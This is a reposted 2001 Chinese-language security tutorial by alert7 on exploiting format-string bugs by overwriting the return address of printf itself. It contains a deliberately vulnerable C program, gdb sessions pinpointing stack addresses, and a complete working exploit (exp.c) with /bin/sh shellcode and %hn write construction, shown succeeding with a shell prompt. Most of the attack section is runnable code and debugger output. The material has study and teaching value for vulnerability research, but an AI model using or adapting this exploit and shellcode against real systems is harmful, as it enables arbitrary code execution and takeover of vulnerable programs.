【分析】利用格式化串覆盖*printf()系列函数本身的返回地址

来源：互联网发布：保罗麦卡特尼之死知乎编辑：程序博客网时间：2024/06/10 09:32

利用格式化串覆盖*printf()系列函数本身的返回地址

创建时间：2001-10-29
文章属性：原创
文章来源：http://www.xfocus.org/
文章提交：alert7 (sztcww_at_sina.com)

利用格式化串覆盖*printf()系列函数本身的返回地址

作者：alert7 <mailto: alert7@netguard.com.cn
                     alert7@xfocus.org
             >

主页:    http://www.netguard.com.cn
    http://www.xfocus.org

时间: 2001-10-26

测试环境:linux redhat 6.2 kernel 2.2.14

★ 前言

在scut写的<<Exploiting Format String Vulnerabilities v1.2>>中列出了六种比较
通用的方法来获得控制权：

1. 覆盖GOT
2. 利用DTORS
3. 利用 C library hooks
4. 利用 atexit 结构(静态编译版本才行)
5. 覆盖函数指针
6. 覆盖jmpbuf's

在这里，不想讨论上面这些东西，请自行参考相关资料

但是有些时候，你只能覆盖0xbfff0000-0xbfffffff的地址空间，因为是format string
被程序做了限制，而程序又调用了exit(0)，(也许你没有碰到过这样类似的漏洞程序，但我
碰到了，而且比这个要求还更苛刻:( ) 所以利用覆盖GOT、利用DTORS、利用C library hooks
这些技术都行不通了，因为这些地址以0x08打头(C library hooks是0x04打头)。覆盖main
返回地址也不行。那总该覆盖到点什么东西使我们的shellcode得到控制权吧。

★ 覆盖格式化函数自己的返回地址

一般的buffer overflow的情况下，是不可能覆盖到象*printf()这种glibc函数的返回地址的，
但是format string就给了我们机会，而且个人认为精确度会更高。
比如说printf(buf),就利用格式化串的buf来覆盖printf函数的返回地址。

★ 存在格式化字符串问题的程序

[alert7@redhat62 alert7]# cat vul.c

#include <stdio.h>
int main(int argc,char **argv)
{
char buf[10000];
bzero(buf,10000);
if (argc==2) {
strncpy(buf,argv[1],9999);
printf(buf);
}
}
[alert7@redhat62 alert7]# gcc -o vul vul.c -g

★ 精确定位几个数据

一查看垃圾数据个数（以4字节为单位）

[alert7@redhat62 alert7]# ./vul aaaa%p%p%p%p%p%p%p%p%p
aaaa0x616161610x702570250x702570250x702570250x702570250x7025(nil)(nil)(nil)
我们看到没有垃圾数据 X=0;如果不明白怎么回事，请查阅
<<Exploiting Format String Vulnerabilities >>

二查看format string 地址

[alert7@redhat62 alert7]# gdb vul -q
(gdb) disass main
Dump of assembler code for function main:
0x8048438 <main>:       push   %ebp
0x8048439 <main+1>:     mov    %esp,%ebp
0x804843b <main+3>:     sub    $0x2710,%esp
0x8048441 <main+9>:     push   $0x2710
0x8048446 <main+14>:    lea    0xffffd8f0(%ebp),%eax
0x804844c <main+20>:    push   %eax
0x804844d <main+21>:    call   0x8048364 <bzero>
0x8048452 <main+26>:    add    $0x8,%esp
0x8048455 <main+29>:    cmpl   $0x2,0x8(%ebp)
0x8048459 <main+33>:    jne    0x8048487 <main+79>
0x804845b <main+35>:    push   $0x270f
0x8048460 <main+40>:    mov    0xc(%ebp),%eax
0x8048463 <main+43>:    add    $0x4,%eax
0x8048466 <main+46>:    mov    (%eax),%edx
0x8048468 <main+48>:    push   %edx
0x8048469 <main+49>:    lea    0xffffd8f0(%ebp),%eax
0x804846f <main+55>:    push   %eax
0x8048470 <main+56>:    call   0x8048374 <strncpy>
0x8048475 <main+61>:    add    $0xc,%esp
0x8048478 <main+64>:    lea    0xffffd8f0(%ebp),%eax
0x804847e <main+70>:    push   %eax
0x804847f <main+71>:    call   0x8048354 <printf>
0x8048484 <main+76>:    add    $0x4,%esp
0x8048487 <main+79>:    leave
0x8048488 <main+80>:    ret
End of assembler dump.

(gdb) b * 0x804847f
Breakpoint 1 at 0x804847f: file vul.c, line 8.
(gdb) r aaaa
Starting program: /home/alert7/overflow/sploit/vul aaaa

Breakpoint 1, 0x804847f in main (argc=2, argv=0xbffffba4) at vul.c:8
8       printf(buf);

(gdb)  p &buf
$1 = (char (*)[10000]) 0xbfffd468
~~~~~~~~~~~~~~~~~~~~~~~^0xbfffd468 format string addr

(gdb) i reg $eax $esp $ebp
eax            0xbfffd468       -1073752984
esp            0xbfffd464       -1073752988
ebp            0xbffffb78       -1073742984

(gdb) x/8x 0xbfffd450
0xbfffd450:     0xbfffd468      0xbffffb78      0x08048475      0xbfffd468
0xbfffd460:     0xbffffcbf      0xbfffd468      0x61616161      0x00000000

(gdb) si
0x8048354 in printf () at printf.c:26
26      printf.c: No such file or directory.

(gdb) x/8x 0xbfffd450
0xbfffd450:     0xbfffd468      0xbffffb78      0x08048475      0xbfffd468
0xbfffd460:     0x08048484      0xbfffd468      0x61616161      0x00000000
~~~~~~~~~~~~~~~~~^就这个地址，已经变成了0x08048484，就是该printf函数的返回地址，
所以我们也找到了printf函数返回地址存放的地址：0xbfffd460
其实0xbfffd464地址的内容就是push %eax下去的东西
0xbfffd460为该printf上下文的栈帧的EIP存放地址

三计算printf函数返回地址存放的地址

现在来用公式表达一下printf函数返回地址存放的地址：(format string addr) -(X*4)-8
format string addr是可以暴力猜测的。X更是可以简单的得到，所以这个地址是很精确的。
当然不同的系统不同的格式化串等等都会导致*printf系列函数返回地址存放的地址不一样，需要
自行研究和纠正公式，这里只是个简单的演示，意在抛砖引玉。

★ 看看我们的利用程序

[alert7@redhat62 alert7]# cat exp.c
/*e*/
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET                    0
#define DEFAULT_ALIGNMENT                 0
#define DEFAULT_RETLOC                  0xbfffd468-0*4-8 //F-X*4-8
                          //F为格式化字符串地址
                          //X为垃圾的个数，X*4也就是
                          //从esp到F的长度

#define NOP                            0x90

char shellcode[] =
   "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90/x90"
    "/xeb/x1f/x5e/x89/x76/x08/x31/xc0/x88/x46/x07/x89/x46/x0c/xb0/x0b"
    "/x89/xf3/x8d/x4e/x08/x8d/x56/x0c/xcd/x80/x31/xdb/x89/xd8/x40/xcd"
    "/x80/xe8/xdc/xff/xff/xff/bin/sh";

int main(int argc, char *argv[]) {
  char *ptr;

  long shell_addr,retloc=DEFAULT_RETLOC;
  int i,SH1,SH2;
  char buf[512];
  char buf1[5000];

  printf("Using RET location address: 0x%x/n", retloc);
  shell_addr = retloc+80;
  printf("Using Shellcode address: 0x%x/n", shell_addr);

SH1 = (shell_addr >> 16) & 0xffff;//SH1=0xbfff
SH2 = (shell_addr >>  0) & 0xffff;//SH2=0xd3a8

ptr = buf;

if ((SH1)<(SH2))
{
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc+2) & 0xff;
       (*ptr++) = ((retloc+2) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 24 ) & 0xff ;
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc) & 0xff;
       (*ptr++) = ((retloc) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc) >> 24 ) & 0xff ;

        sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH1-8*2),(SH2-SH1 ));
    /*推荐构造格式化串的时候使用%hn*/
}

if ((SH1 )>(SH2))
{
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc) & 0xff;
       (*ptr++) = ((retloc) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc) >> 24 ) & 0xff ;
       memset(ptr,'B',4);
       ptr += 4 ;
       (*ptr++) =  (retloc+2) & 0xff;
       (*ptr++) = ((retloc+2) >> 8  ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 16 ) & 0xff ;
       (*ptr++) = ((retloc+2) >> 24 ) & 0xff ;

        sprintf(ptr,"%%%uc%%hn%%%uc%%hn",(SH2-8*2),(SH1-SH2 ));
}
if ((SH1 )==(SH2))
    {
    printf("不能用一个printf实现这种情况/n");
    }
sprintf(buf1,"%s%s",buf,shellcode);
execle("./vul","vul",buf1, NULL,NULL);
}

[alert7@redhat62 alert7]# gcc -o exp exp.c
[alert7@redhat62 alert7]# ./exp
    ......（省略了一些printf出来的乱信息）
               B隵1繤F
                      ?
                       骎
                         ?圬@丸?/bin/sh[alert7@redhat62 alert7]#
怎么会没有成功呢，我们来看看怎么回事，在vul.c的printf(buf)之前加个sleep(30);
先在一个tty上运行./exp,在另外一个tty上如下操作：
[alert7@redhat62 /alert7]# ps -aux|grep vul
alert7       892  0.3  0.3  1084  296 pts/0    S    10:41   0:00 vul BBBBb?緽BBB`
alert7       895  0.0  0.5  1360  508 pts/3    S    10:42   0:00 grep vul
[alert7@redhat62 alert7]# gdb vul -q
(gdb) attach 892
Attaching to program: /home/alert7/vul, Pid 892
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
0x400a9c61 in __libc_nanosleep () from /lib/libc.so.6
(gdb) b printf
Breakpoint 1 at 0x4006605c: file printf.c, line 30.
(gdb) c
Continuing.

Breakpoint 1, printf (
    format=0xbfffd718 "BBBBb?緽BBB`??49135c%hn%5297c%hn", '/220' <repeats 128
times>, "隲037^/211v/b1繺210F/a/211F/f癨013/211骪215N/b/215V/f蚛2001踈211谸蚛20
0柢"...) at printf.c:30
30      printf.c: No such file or directory.
我们可以看到，用execle出来的format string地址就不是原来的0xbfffd468了，而是现在的
format=0xbfffd718了，所以我们的exploit程序应该修改这个地址。重新编译执行。
[alert7@redhat62 alert7]# ./exp
.....（省略了一些printf出来的乱信息）
B隵1繤F
骎
?圬@蚥ash#
bash# ：）OK，成功了！！！

★ 小结

利用格式化串覆盖*printf()系列函数本身的返回地址应该是个很不错的方法，而且在格式串
问题上显的很有优势，精确度更高。
最后，欢迎来email讨论。

参考资料：
<<Exploiting Format String Vulnerabilities >> by scut /team teso